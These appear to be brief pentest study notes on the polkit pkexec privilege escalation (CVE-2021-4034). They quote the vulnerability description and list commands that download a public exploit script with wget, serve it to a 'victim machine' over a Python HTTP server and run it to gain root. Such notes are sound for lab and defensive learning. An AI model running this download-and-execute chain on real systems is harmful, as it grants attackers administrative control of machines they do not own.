CVE-2021-4034

NIST-CVE-2021-4034

A local privilege escalation vulnerability was found on polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according predefined policies. The current version of pkexec doesn't handle the calling parameters count correctly and ends trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way it'll induce pkexec to execute arbitrary code. When successfully executed the attack can cause a local privilege escalation given unprivileged users administrative rights on the target machine.

We have pkexecwith SUID the bit enabled.
The exploit https://github.com/Almorabea/pkexec-exploit

wget https://raw.githubusercontent.com/Almorabea/pkexec-exploit/refs/heads/main/CVE-2021-4034.py

Or the code CVE-2021-4034-exploit

And transfer to the victim machine

Transfer files

Using Python, in the folder that contain the file to send on the source machine. E.g. file.txt #flashcard

python -m http.server 4545

On the destination machine

wget http://IP_SOURCE_MACHINE:4545/file.txt

Run the exploit

python3 CVE-2021-4034.py